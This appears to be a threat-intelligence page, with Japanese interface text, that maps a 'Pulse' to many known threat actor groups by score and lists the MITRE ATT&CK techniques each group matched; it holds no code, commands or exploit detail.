  • T1068 - Exploitation for Privilege Escalation
  • T1573 - Encrypted Channel
  • T1203 - Exploitation for Client Execution
  • T1027.006 - HTML Smuggling
  • T1665 - Hide Infrastructure
  • T1204.001 - Malicious Link
  • T1566.003 - Spearphishing via Service
MITREへのリンク →

Gamaredon Group

Score: 42.26
Matched TTPs:
  • T1016.001 - Internet Connection Discovery
  • T1005 - Data from Local System
  • T1608.001 - Upload Malware
  • T1090 - Proxy
  • T1083 - File and Directory Discovery
  • T1568 - Dynamic Resolution
  • T1218.005 - Mshta
  • T1583.006 - Web Services
  • T1102.003 - One-Way Communication
  • T1534 - Internal Spearphishing
  • T1090.003 - Multi-hop Proxy
  • T1562.001 - Disable or Modify Tools
  • T1001 - Data Obfuscation
  • T1039 - Data from Network Shared Drive
  • T1102.002 - Bidirectional Communication
  • T1071.001 - Web Protocols
  • T1204.001 - Malicious Link
MITREへのリンク →

TA2541

Score: 15.51
Matched TTPs:
  • T1016.001 - Internet Connection Discovery
  • T1608.001 - Upload Malware
  • T1568 - Dynamic Resolution
  • T1218.005 - Mshta
  • T1583.006 - Web Services
  • T1562.001 - Disable or Modify Tools
  • T1204.001 - Malicious Link
MITREへのリンク →

ZIRCONIUM

Score: 27.83
Matched TTPs:
  • T1584.008 - Network Devices
  • T1598.003 - Spearphishing Link
  • T1016 - System Network Configuration Discovery
  • T1036.004 - Masquerade Task or Service
  • T1583.006 - Web Services
  • T1090.003 - Multi-hop Proxy
  • T1068 - Exploitation for Privilege Escalation
  • T1102.002 - Bidirectional Communication
  • T1598 - Phishing for Information
  • T1665 - Hide Infrastructure
  • T1204.001 - Malicious Link
MITREへのリンク →

Leviathan

Score: 33.64
Matched TTPs:
  • T1584.008 - Network Devices
  • T1190 - Exploit Public-Facing Application
  • T1572 - Protocol Tunneling
  • T1595.002 - Vulnerability Scanning
  • T1505.003 - Web Shell
  • T1585.002 - Email Accounts
  • T1102.003 - One-Way Communication
  • T1534 - Internal Spearphishing
  • T1090.003 - Multi-hop Proxy
  • T1078 - Valid Accounts
  • T1203 - Exploitation for Client Execution
  • T1189 - Drive-by Compromise
  • T1584.004 - Server
  • T1204.001 - Malicious Link
MITREへのリンク →

Mustard Tempest

Score: 12.92
Matched TTPs:
  • T1583.008 - Malvertising
  • T1608.001 - Upload Malware
  • T1583.004 - Server
  • T1189 - Drive-by Compromise
  • T1204.001 - Malicious Link
MITREへのリンク →

Daggerfly

Score: 13.02
Matched TTPs:
  • T1003.002 - Security Account Manager
  • T1036.003 - Rename Legitimate Utilities
  • T1189 - Drive-by Compromise
  • T1071.001 - Web Protocols
  • T1584.004 - Server
  • T1204.001 - Malicious Link
MITREへのリンク →

Dragonfly

Score: 42.67
Matched TTPs:
  • T1003.002 - Security Account Manager
  • T1598.003 - Spearphishing Link
  • T1005 - Data from Local System
  • T1190 - Exploit Public-Facing Application
  • T1562.004 - Disable or Modify System Firewall
  • T1595.002 - Vulnerability Scanning
  • T1505.003 - Web Shell
  • T1591.002 - Business Relationships
  • T1016 - System Network Configuration Discovery
  • T1083 - File and Directory Discovery
  • T1598.002 - Spearphishing Attachment
  • T1071.002 - File Transfer Protocols
  • T1210 - Exploitation of Remote Services
  • T1078 - Valid Accounts
  • T1203 - Exploitation for Client Execution
  • T1189 - Drive-by Compromise
  • T1584.004 - Server
  • T1018 - Remote System Discovery
  • T1003.003 - NTDS
MITREへのリンク →

Axiom

Score: 18.35
Matched TTPs:
  • T1583.002 - DNS Server
  • T1005 - Data from Local System
  • T1190 - Exploit Public-Facing Application
  • T1546.008 - Accessibility Features
  • T1584.005 - Botnet
  • T1078 - Valid Accounts
  • T1203 - Exploitation for Client Execution
  • T1189 - Drive-by Compromise
MITREへのリンク →

LazyScripter

Score: 10.43
Matched TTPs:
  • T1071.004 - DNS
  • T1608.001 - Upload Malware
  • T1218.005 - Mshta
  • T1583.006 - Web Services
  • T1204.001 - Malicious Link
MITREへのリンク →

Cobalt Group

Score: 19.90
Matched TTPs:
  • T1071.004 - DNS
  • T1219 - Remote Access Tools
  • T1218.003 - CMSTP
  • T1572 - Protocol Tunneling
  • T1068 - Exploitation for Privilege Escalation
  • T1203 - Exploitation for Client Execution
  • T1071.001 - Web Protocols
  • T1046 - Network Service Discovery
  • T1204.001 - Malicious Link
MITREへのリンク →

Tropic Trooper

Score: 22.23
Matched TTPs:
  • T1071.004 - DNS
  • T1505.003 - Web Shell
  • T1016 - System Network Configuration Discovery
  • T1083 - File and Directory Discovery
  • T1052.001 - Exfiltration over USB
  • T1573 - Encrypted Channel
  • T1203 - Exploitation for Client Execution
  • T1071.001 - Web Protocols
  • T1046 - Network Service Discovery
  • T1518 - Software Discovery
MITREへのリンク →

APT18

Score: 6.66
Matched TTPs:
  • T1071.004 - DNS
  • T1083 - File and Directory Discovery
  • T1078 - Valid Accounts
  • T1071.001 - Web Protocols
MITREへのリンク →

FIN7

Score: 37.75
Matched TTPs:
  • T1071.004 - DNS
  • T1587.001 - Malware
  • T1005 - Data from Local System
  • T1608.001 - Upload Malware
  • T1190 - Exploit Public-Facing Application
  • T1219 - Remote Access Tools
  • T1572 - Protocol Tunneling
  • T1562.004 - Disable or Modify System Firewall
  • T1036.004 - Masquerade Task or Service
  • T1218.005 - Mshta
  • T1608.005 - Link Target
  • T1583.006 - Web Services
  • T1210 - Exploitation of Remote Services
  • T1078 - Valid Accounts
  • T1486 - Data Encrypted for Impact
  • T1102.002 - Bidirectional Communication
  • T1204.001 - Malicious Link
MITREへのリンク →

Winter Vivern

Score: 23.22
Matched TTPs:
  • T1114.001 - Local Email Collection
  • T1190 - Exploit Public-Facing Application
  • T1595.002 - Vulnerability Scanning
  • T1056.003 - Web Portal Capture
  • T1083 - File and Directory Discovery
  • T1036.004 - Masquerade Task or Service
  • T1584.006 - Web Services
  • T1189 - Drive-by Compromise
  • T1071.001 - Web Protocols
  • T1204.001 - Malicious Link
MITREへのリンク →

Moonstone Sleet

Score: 19.77
Matched TTPs:
  • T1587.001 - Malware
  • T1598.003 - Spearphishing Link
  • T1608.001 - Upload Malware
  • T1585.002 - Email Accounts
  • T1016 - System Network Configuration Discovery
  • T1486 - Data Encrypted for Impact
  • T1598 - Phishing for Information
  • T1071.001 - Web Protocols
  • T1566.003 - Spearphishing via Service
MITREへのリンク →

LuminousMoth

Score: 13.21
Matched TTPs:
  • T1587.001 - Malware
  • T1005 - Data from Local System
  • T1608.001 - Upload Malware
  • T1083 - File and Directory Discovery
  • T1608.005 - Link Target
  • T1071.001 - Web Protocols
  • T1204.001 - Malicious Link
MITREへのリンク →

Salt Typhoon

Score: 19.85
Matched TTPs:
  • T1587.001 - Malware
  • T1040 - Network Sniffing
  • T1590.004 - Network Topology
  • T1190 - Exploit Public-Facing Application
  • T1572 - Protocol Tunneling
  • T1602.002 - Network Device Configuration Dump
  • T1562.004 - Disable or Modify System Firewall
MITREへのリンク →

Aoqin Dragon

Score: 7.12
Matched TTPs:
  • T1587.001 - Malware
  • T1083 - File and Directory Discovery
  • T1203 - Exploitation for Client Execution
  • T1570 - Lateral Tool Transfer
MITREへのリンク →

Moses Staff

Score: 9.14
Matched TTPs:
  • T1587.001 - Malware
  • T1190 - Exploit Public-Facing Application
  • T1562.004 - Disable or Modify System Firewall
  • T1505.003 - Web Shell
  • T1016 - System Network Configuration Discovery
MITREへのリンク →

TeamTNT

Score: 37.88
Matched TTPs:
  • T1587.001 - Malware
  • T1007 - System Service Discovery
  • T1071 - Application Layer Protocol
  • T1608.001 - Upload Malware
  • T1219 - Remote Access Tools
  • T1562.004 - Disable or Modify System Firewall
  • T1595.002 - Vulnerability Scanning
  • T1610 - Deploy Container
  • T1016 - System Network Configuration Discovery
  • T1083 - File and Directory Discovery
  • T1048 - Exfiltration Over Alternative Protocol
  • T1562.001 - Disable or Modify Tools
  • T1595.001 - Scanning IP Blocks
  • T1071.001 - Web Protocols
  • T1046 - Network Service Discovery
MITREへのリンク →

Scattered Spider

Score: 56.76
Matched TTPs:
  • T1484.002 - Trust Modification
  • T1598.003 - Spearphishing Link
  • T1070.008 - Clear Mailbox Data
  • T1572 - Protocol Tunneling
  • T1589 - Gather Victim Identity Information
  • T1598.004 - Spearphishing Voice
  • T1016 - System Network Configuration Discovery
  • T1090 - Proxy
  • T1083 - File and Directory Discovery
  • T1021.007 - Cloud Services
  • T1204 - User Execution
  • T1562.001 - Disable or Modify Tools
  • T1078 - Valid Accounts
  • T1068 - Exploitation for Privilege Escalation
  • T1486 - Data Encrypted for Impact
  • T1598 - Phishing for Information
  • T1213.003 - Code Repositories
  • T1018 - Remote System Discovery
  • T1538 - Cloud Service Dashboard
  • T1003.003 - NTDS
MITREへのリンク →

Storm-0501

Score: 13.88
Matched TTPs:
  • T1484.002 - Trust Modification
  • T1190 - Exploit Public-Facing Application
  • T1036.004 - Masquerade Task or Service
  • T1021.007 - Cloud Services
  • T1486 - Data Encrypted for Impact
MITREへのリンク →

FIN6

Score: 27.02
Matched TTPs:
  • T1213.006 - Databases
  • T1005 - Data from Local System
  • T1572 - Protocol Tunneling
  • T1036.004 - Masquerade Task or Service
  • T1562.001 - Disable or Modify Tools
  • T1078 - Valid Accounts
  • T1068 - Exploitation for Privilege Escalation
  • T1134 - Access Token Manipulation
  • T1018 - Remote System Discovery
  • T1046 - Network Service Discovery
  • T1003.003 - NTDS
  • T1566.003 - Spearphishing via Service
MITREへのリンク →

Sidewinder

Score: 17.98
Matched TTPs:
  • T1598.003 - Spearphishing Link
  • T1016 - System Network Configuration Discovery
  • T1083 - File and Directory Discovery
  • T1218.005 - Mshta
  • T1598.002 - Spearphishing Attachment
  • T1203 - Exploitation for Client Execution
  • T1071.001 - Web Protocols
  • T1518 - Software Discovery
  • T1204.001 - Malicious Link
MITREへのリンク →

Silent Librarian

Score: 10.01
Matched TTPs:
  • T1598.003 - Spearphishing Link
  • T1585.002 - Email Accounts
  • T1608.005 - Link Target
  • T1078 - Valid Accounts
MITREへのリンク →

CURIUM

Score: 19.15
Matched TTPs:
  • T1598.003 - Spearphishing Link
  • T1005 - Data from Local System
  • T1505.003 - Web Shell
  • T1583.004 - Server
  • T1585.002 - Email Accounts
  • T1584.006 - Web Services
  • T1189 - Drive-by Compromise
  • T1566.003 - Spearphishing via Service
MITREへのリンク →

Patchwork

Score: 13.11
Matched TTPs:
  • T1598.003 - Spearphishing Link
  • T1005 - Data from Local System
  • T1083 - File and Directory Discovery
  • T1203 - Exploitation for Client Execution
  • T1189 - Drive-by Compromise
  • T1204.001 - Malicious Link
  • T1102.001 - Dead Drop Resolver
MITREへのリンク →

admin@338

Score: 6.79
Matched TTPs:
  • T1007 - System Service Discovery
  • T1016 - System Network Configuration Discovery
  • T1083 - File and Directory Discovery
  • T1203 - Exploitation for Client Execution
MITREへのリンク →

Velvet Ant

Score: 17.07
Matched TTPs:
  • T1040 - Network Sniffing
  • T1071 - Application Layer Protocol
  • T1562.004 - Disable or Modify System Firewall
  • T1083 - File and Directory Discovery
  • T1562.001 - Disable or Modify Tools
  • T1570 - Lateral Tool Transfer
  • T1090.001 - Internal Proxy
MITREへのリンク →

DarkVishnya

Score: 7.39
Matched TTPs:
  • T1040 - Network Sniffing
  • T1219 - Remote Access Tools
  • T1046 - Network Service Discovery
MITREへのリンク →

Rocke

Score: 20.96
Matched TTPs:
  • T1071 - Application Layer Protocol
  • T1190 - Exploit Public-Facing Application
  • T1562.004 - Disable or Modify System Firewall
  • T1055.002 - Portable Executable Injection
  • T1562.001 - Disable or Modify Tools
  • T1071.001 - Web Protocols
  • T1018 - Remote System Discovery
  • T1046 - Network Service Discovery
  • T1102.001 - Dead Drop Resolver
MITREへのリンク →

LAPSUS$

Score: 40.13
Matched TTPs:
  • T1005 - Data from Local System
  • T1589 - Gather Victim Identity Information
  • T1598.004 - Spearphishing Voice
  • T1591.002 - Business Relationships
  • T1593.003 - Code Repositories
  • T1090 - Proxy
  • T1204 - User Execution
  • T1078 - Valid Accounts
  • T1068 - Exploitation for Privilege Escalation
  • T1584.002 - DNS Server
  • T1213.003 - Code Repositories
  • T1111 - Multi-Factor Authentication Interception
  • T1003.003 - NTDS
MITREへのリンク →

Windigo

Score: 9.60
Matched TTPs:
  • T1005 - Data from Local System
  • T1090 - Proxy
  • T1083 - File and Directory Discovery
  • T1189 - Drive-by Compromise
  • T1518 - Software Discovery
MITREへのリンク →

APT37

Score: 8.29
Matched TTPs:
  • T1005 - Data from Local System
  • T1102.002 - Bidirectional Communication
  • T1203 - Exploitation for Client Execution
  • T1189 - Drive-by Compromise
  • T1071.001 - Web Protocols
MITREへのリンク →

Inception

Score: 13.26
Matched TTPs:
  • T1005 - Data from Local System
  • T1083 - File and Directory Discovery
  • T1218.005 - Mshta
  • T1090.003 - Multi-hop Proxy
  • T1203 - Exploitation for Client Execution
  • T1071.001 - Web Protocols
  • T1518 - Software Discovery
MITREへのリンク →

Stealth Falcon

Score: 7.73
Matched TTPs:
  • T1005 - Data from Local System
  • T1016 - System Network Configuration Discovery
  • T1555.004 - Windows Credential Manager
  • T1071.001 - Web Protocols
MITREへのリンク →

Dark Caracal

Score: 8.22
Matched TTPs:
  • T1005 - Data from Local System
  • T1083 - File and Directory Discovery
  • T1189 - Drive-by Compromise
  • T1071.001 - Web Protocols
  • T1566.003 - Spearphishing via Service
MITREへのリンク →

BlackByte

Score: 34.26
Matched TTPs:
  • T1562 - Impair Defenses
  • T1608.001 - Upload Malware
  • T1190 - Exploit Public-Facing Application
  • T1219 - Remote Access Tools
  • T1562.004 - Disable or Modify System Firewall
  • T1505.003 - Web Shell
  • T1016 - System Network Configuration Discovery
  • T1134.003 - Make and Impersonate Token
  • T1562.001 - Disable or Modify Tools
  • T1078 - Valid Accounts
  • T1068 - Exploitation for Privilege Escalation
  • T1486 - Data Encrypted for Impact
  • T1570 - Lateral Tool Transfer
  • T1071.001 - Web Protocols
  • T1018 - Remote System Discovery
  • T1046 - Network Service Discovery
MITREへのリンク →

SideCopy

Score: 12.15
Matched TTPs:
  • T1608.001 - Upload Malware
  • T1016 - System Network Configuration Discovery
  • T1218.005 - Mshta
  • T1598.002 - Spearphishing Attachment
  • T1518 - Software Discovery
MITREへのリンク →

TA505

Score: 8.66
Matched TTPs:
  • T1608.001 - Upload Malware
  • T1562.001 - Disable or Modify Tools
  • T1486 - Data Encrypted for Impact
  • T1071.001 - Web Protocols
  • T1204.001 - Malicious Link
MITREへのリンク →

BITTER

Score: 15.75
Matched TTPs:
  • T1608.001 - Upload Malware
  • T1568 - Dynamic Resolution
  • T1036.004 - Masquerade Task or Service
  • T1068 - Exploitation for Privilege Escalation
  • T1573 - Encrypted Channel
  • T1203 - Exploitation for Client Execution
  • T1071.001 - Web Protocols
MITREへのリンク →

Saint Bear

Score: 8.64
Matched TTPs:
  • T1608.001 - Upload Malware
  • T1583.006 - Web Services
  • T1562.001 - Disable or Modify Tools
  • T1203 - Exploitation for Client Execution
  • T1204.001 - Malicious Link
MITREへのリンク →

EXOTIC LILY

Score: 13.48
Matched TTPs:
  • T1608.001 - Upload Malware
  • T1585.002 - Email Accounts
  • T1593.001 - Social Media
  • T1203 - Exploitation for Client Execution
  • T1204.001 - Malicious Link
  • T1566.003 - Spearphishing via Service
MITREへのリンク →

BackdoorDiplomacy

Score: 7.10
Matched TTPs:
  • T1190 - Exploit Public-Facing Application
  • T1505.003 - Web Shell
  • T1036.004 - Masquerade Task or Service
  • T1046 - Network Service Discovery
MITREへのリンク →

GOLD SOUTHFIELD

Score: 4.06
Matched TTPs:
  • T1190 - Exploit Public-Facing Application
  • T1219 - Remote Access Tools
MITREへのリンク →

BlackTech

Score: 6.09
Matched TTPs:
  • T1190 - Exploit Public-Facing Application
  • T1203 - Exploitation for Client Execution
  • T1046 - Network Service Discovery
  • T1204.001 - Malicious Link
MITREへのリンク →

Medusa Group

Score: 41.29
Matched TTPs:
  • T1190 - Exploit Public-Facing Application
  • T1219 - Remote Access Tools
  • T1608.002 - Upload Tool
  • T1562.004 - Disable or Modify System Firewall
  • T1505.003 - Web Shell
  • T1585.002 - Email Accounts
  • T1016 - System Network Configuration Discovery
  • T1083 - File and Directory Discovery
  • T1583.006 - Web Services
  • T1090.003 - Multi-hop Proxy
  • T1562.001 - Disable or Modify Tools
  • T1078 - Valid Accounts
  • T1486 - Data Encrypted for Impact
  • T1570 - Lateral Tool Transfer
  • T1650 - Acquire Access
  • T1071.001 - Web Protocols
  • T1018 - Remote System Discovery
  • T1046 - Network Service Discovery
  • T1003.003 - NTDS
MITREへのリンク →

Cinnamon Tempest

Score: 7.76
Matched TTPs:
  • T1190 - Exploit Public-Facing Application
  • T1572 - Protocol Tunneling
  • T1090 - Proxy
  • T1078 - Valid Accounts
MITREへのリンク →

Blue Mockingbird

Score: 7.66
Matched TTPs:
  • T1190 - Exploit Public-Facing Application
  • T1090 - Proxy
  • T1134 - Access Token Manipulation
MITREへのリンク →

Volatile Cedar

Score: 5.83
Matched TTPs:
  • T1190 - Exploit Public-Facing Application
  • T1595.002 - Vulnerability Scanning
  • T1505.003 - Web Shell
MITREへのリンク →

Carbanak

Score: 10.85
Matched TTPs:
  • T1219 - Remote Access Tools
  • T1562.004 - Disable or Modify System Firewall
  • T1036.004 - Masquerade Task or Service
  • T1078 - Valid Accounts
  • T1102.002 - Bidirectional Communication
MITREへのリンク →

MoustachedBouncer

Score: 8.97
Matched TTPs:
  • T1659 - Content Injection
  • T1090 - Proxy
  • T1068 - Exploitation for Privilege Escalation
MITREへのリンク →

Higaisa

Score: 13.71
Matched TTPs:
  • T1029 - Scheduled Transfer
  • T1016 - System Network Configuration Discovery
  • T1036.004 - Masquerade Task or Service
  • T1203 - Exploitation for Client Execution
  • T1071.001 - Web Protocols
  • T1090.001 - Internal Proxy
MITREへのリンク →

SilverTerrier

Score: 8.09
Matched TTPs:
  • T1071.003 - Mail Protocols
  • T1071.002 - File Transfer Protocols
  • T1071.001 - Web Protocols
MITREへのリンク →

Deep Panda

Score: 6.59
Matched TTPs:
  • T1505.003 - Web Shell
  • T1546.008 - Accessibility Features
  • T1018 - Remote System Discovery
MITREへのリンク →

FIN5

Score: 5.71
Matched TTPs:
  • T1090.002 - External Proxy
  • T1078 - Valid Accounts
  • T1018 - Remote System Discovery
MITREへのリンク →

Silence

Score: 5.71
Matched TTPs:
  • T1090.002 - External Proxy
  • T1078 - Valid Accounts
  • T1018 - Remote System Discovery
MITREへのリンク →

APT19

Score: 4.42
Matched TTPs:
  • T1016 - System Network Configuration Discovery
  • T1189 - Drive-by Compromise
  • T1071.001 - Web Protocols
MITREへのリンク →

Naikon

Score: 6.87
Matched TTPs:
  • T1016 - System Network Configuration Discovery
  • T1036.004 - Masquerade Task or Service
  • T1018 - Remote System Discovery
  • T1046 - Network Service Discovery
MITREへのリンク →

POLONIUM

Score: 8.18
Matched TTPs:
  • T1090 - Proxy
  • T1583.006 - Web Services
  • T1078 - Valid Accounts
  • T1102.002 - Bidirectional Communication
MITREへのリンク →

Confucius

Score: 9.69
Matched TTPs:
  • T1083 - File and Directory Discovery
  • T1218.005 - Mshta
  • T1583.006 - Web Services
  • T1203 - Exploitation for Client Execution
  • T1071.001 - Web Protocols
  • T1204.001 - Malicious Link
MITREへのリンク →

Leafminer

Score: 6.37
Matched TTPs:
  • T1083 - File and Directory Discovery
  • T1189 - Drive-by Compromise
  • T1018 - Remote System Discovery
  • T1046 - Network Service Discovery
MITREへのリンク →

RedEcho

Score: 4.47
Matched TTPs:
  • T1568 - Dynamic Resolution
  • T1071.001 - Web Protocols
MITREへのリンク →

Transparent Tribe

Score: 7.90
Matched TTPs:
  • T1568 - Dynamic Resolution
  • T1203 - Exploitation for Client Execution
  • T1189 - Drive-by Compromise
  • T1204.001 - Malicious Link
MITREへのリンク →

PROMETHIUM

Score: 7.99
Matched TTPs:
  • T1036.004 - Masquerade Task or Service
  • T1205.001 - Port Knocking
  • T1189 - Drive-by Compromise
MITREへのリンク →

Gorgon Group

Score: 5.93
Matched TTPs:
  • T1055.002 - Portable Executable Injection
  • T1562.001 - Disable or Modify Tools
MITREへのリンク →

APT17

Score: 5.45
Matched TTPs:
  • T1583.006 - Web Services
  • T1585 - Establish Accounts
MITREへのリンク →

TA578

Score: 3.37
Matched TTPs:
  • T1583.006 - Web Services
  • T1204.001 - Malicious Link
MITREへのリンク →

Suckfly

Score: 3.19
Matched TTPs:
  • T1078 - Valid Accounts
  • T1046 - Network Service Discovery
MITREへのリンク →

FIN10

Score: 3.66
Matched TTPs:
  • T1078 - Valid Accounts
  • T1570 - Lateral Tool Transfer
MITREへのリンク →

Storm-1811

Score: 7.10
Matched TTPs:
  • T1486 - Data Encrypted for Impact
  • T1570 - Lateral Tool Transfer
  • T1566.003 - Spearphishing via Service
MITREへのリンク →

APT12

Score: 3.89
Matched TTPs:
  • T1102.002 - Bidirectional Communication
  • T1203 - Exploitation for Client Execution
MITREへのリンク →

Elderwood

Score: 4.62
Matched TTPs:
  • T1203 - Exploitation for Client Execution
  • T1189 - Drive-by Compromise
  • T1204.001 - Malicious Link
MITREへのリンク →

RTM

Score: 5.05
Matched TTPs:
  • T1189 - Drive-by Compromise
  • T1102.001 - Dead Drop Resolver
MITREへのリンク →

Windshift

Score: 9.58
Matched TTPs:
  • T1189 - Drive-by Compromise
  • T1071.001 - Web Protocols
  • T1518 - Software Discovery
  • T1204.001 - Malicious Link
  • T1566.003 - Spearphishing via Service
MITREへのリンク →

Machete

Score: 3.13
Matched TTPs:
  • T1189 - Drive-by Compromise
  • T1204.001 - Malicious Link
MITREへのリンク →

Equation

Score: 4.13
Matched TTPs:
  • T1564.005 - Hidden File System
MITREへのリンク →

Strider

Score: 7.06
Matched TTPs:
  • T1564.005 - Hidden File System
  • T1090.001 - Internal Proxy
MITREへのリンク →

このPulseに関連する脅威アクター (推論ベース)

Kimsuky

Score: 0.70
Matched TTPs:
  • T1071.003 - Mail Protocols
  • T1593.001 - Social Media
  • T1583.006 - Web Services
  • T1560.001 - Archive via Utility
  • T1071.002 - File Transfer Protocols
  • T1102.001 - Dead Drop Resolver
  • T1534 - Internal Spearphishing
  • T1016 - System Network Configuration Discovery
  • T1608.001 - Upload Malware
  • T1583.004 - Server
  • T1005 - Data from Local System
  • T1040 - Network Sniffing
  • T1583 - Acquire Infrastructure
  • T1218.005 - Mshta
  • T1190 - Exploit Public-Facing Application
  • T1505.003 - Web Shell
  • T1598.003 - Spearphishing Link
  • T1585 - Establish Accounts
  • T1056.001 - Keylogging
  • T1562.004 - Disable or Modify System Firewall
  • T1562.001 - Disable or Modify Tools
  • T1587.001 - Malware
  • T1007 - System Service Discovery
  • T1598 - Phishing for Information
  • T1083 - File and Directory Discovery
  • T1588.005 - Exploits
  • T1205 - Traffic Signaling
  • T1204.001 - Malicious Link
  • T1071.001 - Web Protocols
  • T1111 - Multi-Factor Authentication Interception
  • T1102.002 - Bidirectional Communication
  • T1036.004 - Masquerade Task or Service
  • T1585.002 - Email Accounts
MITREへのリンク →

Magic Hound

Score: 0.68
Matched TTPs:
  • T1589 - Gather Victim Identity Information
  • T1583.006 - Web Services
  • T1018 - Remote System Discovery
  • T1560.001 - Archive via Utility
  • T1016 - System Network Configuration Discovery
  • T1046 - Network Service Discovery
  • T1189 - Drive-by Compromise
  • T1005 - Data from Local System
  • T1570 - Lateral Tool Transfer
  • T1190 - Exploit Public-Facing Application
  • T1595.002 - Vulnerability Scanning
  • T1505.003 - Web Shell
  • T1486 - Data Encrypted for Impact
  • T1598.003 - Spearphishing Link
  • T1016.001 - Internet Connection Discovery
  • T1114.001 - Local Email Collection
  • T1056.001 - Keylogging
  • T1562.004 - Disable or Modify System Firewall
  • T1562.001 - Disable or Modify Tools
  • T1590.005 - IP Addresses
  • T1592.002 - Software
  • T1591.001 - Determine Physical Locations
  • T1083 - File and Directory Discovery
  • T1572 - Protocol Tunneling
  • T1090 - Proxy
  • T1573 - Encrypted Channel
  • T1562 - Impair Defenses
  • T1204.001 - Malicious Link
  • T1071.001 - Web Protocols
  • T1566.003 - Spearphishing via Service
  • T1102.002 - Bidirectional Communication
  • T1071 - Application Layer Protocol
  • T1036.004 - Masquerade Task or Service
  • T1585.002 - Email Accounts
MITREへのリンク →

Sandworm Team

Score: 0.64
Matched TTPs:
  • T1499 - Endpoint Denial of Service
  • T1018 - Remote System Discovery
  • T1213.006 - Databases
  • T1608.001 - Upload Malware
  • T1583.004 - Server
  • T1003.003 - NTDS
  • T1005 - Data from Local System
  • T1570 - Lateral Tool Transfer
  • T1040 - Network Sniffing
  • T1583 - Acquire Infrastructure
  • T1190 - Exploit Public-Facing Application
  • T1595.002 - Vulnerability Scanning
  • T1505.003 - Web Shell
  • T1486 - Data Encrypted for Impact
  • T1598.003 - Spearphishing Link
  • T1591.002 - Business Relationships
  • T1056.001 - Keylogging
  • T1587.001 - Malware
  • T1592.002 - Software
  • T1083 - File and Directory Discovery
  • T1090 - Proxy
  • T1491.002 - External Defacement
  • T1584.004 - Server
  • T1204.001 - Malicious Link
  • T1071.001 - Web Protocols
  • T1078 - Valid Accounts
  • T1102.002 - Bidirectional Communication
  • T1219 - Remote Access Tools
  • T1203 - Exploitation for Client Execution
  • T1585.002 - Email Accounts
  • T1584.005 - Botnet
MITREへのリンク →

Volt Typhoon

Score: 0.61
Matched TTPs:
  • T1068 - Exploitation for Privilege Escalation
  • T1589 - Gather Victim Identity Information
  • T1018 - Remote System Discovery
  • T1560.001 - Archive via Utility
  • T1590.006 - Network Security Appliances
  • T1016 - System Network Configuration Discovery
  • T1046 - Network Service Discovery
  • T1003.003 - NTDS
  • T1005 - Data from Local System
  • T1570 - Lateral Tool Transfer
  • T1190 - Exploit Public-Facing Application
  • T1505.003 - Web Shell
  • T1016.001 - Internet Connection Discovery
  • T1056.001 - Keylogging
  • T1070.007 - Clear Network Connection History and Configurations
  • T1590.004 - Network Topology
  • T1007 - System Service Discovery
  • T1083 - File and Directory Discovery
  • T1090.003 - Multi-hop Proxy
  • T1596.005 - Scan Databases
  • T1584.008 - Network Devices
  • T1090.001 - Internal Proxy
  • T1090 - Proxy
  • T1584.003 - Virtual Private Server
  • T1584.004 - Server
  • T1078 - Valid Accounts
  • T1518 - Software Discovery
  • T1584.005 - Botnet
MITREへのリンク →

APT28

Score: 0.58
Matched TTPs:
  • T1071.003 - Mail Protocols
  • T1068 - Exploitation for Privilege Escalation
  • T1039 - Data from Network Shared Drive
  • T1583.006 - Web Services
  • T1560.001 - Archive via Utility
  • T1189 - Drive-by Compromise
  • T1090.002 - External Proxy
  • T1003.003 - NTDS
  • T1005 - Data from Local System
  • T1040 - Network Sniffing
  • T1190 - Exploit Public-Facing Application
  • T1595.002 - Vulnerability Scanning
  • T1505.003 - Web Shell
  • T1598.003 - Spearphishing Link
  • T1056.001 - Keylogging
  • T1001.001 - Junk Data
  • T1598 - Phishing for Information
  • T1498 - Network Denial of Service
  • T1083 - File and Directory Discovery
  • T1090.003 - Multi-hop Proxy
  • T1584.008 - Network Devices
  • T1210 - Exploitation of Remote Services
  • T1092 - Communication Through Removable Media
  • T1204.001 - Malicious Link
  • T1071.001 - Web Protocols
  • T1102.002 - Bidirectional Communication
  • T1078 - Valid Accounts
  • T1203 - Exploitation for Client Execution
MITREへのリンク →

Related CVEs

このPulseに見つかったCVEはありません。

Pulse – 脅威アクター グラフ

← Pulse一覧に戻る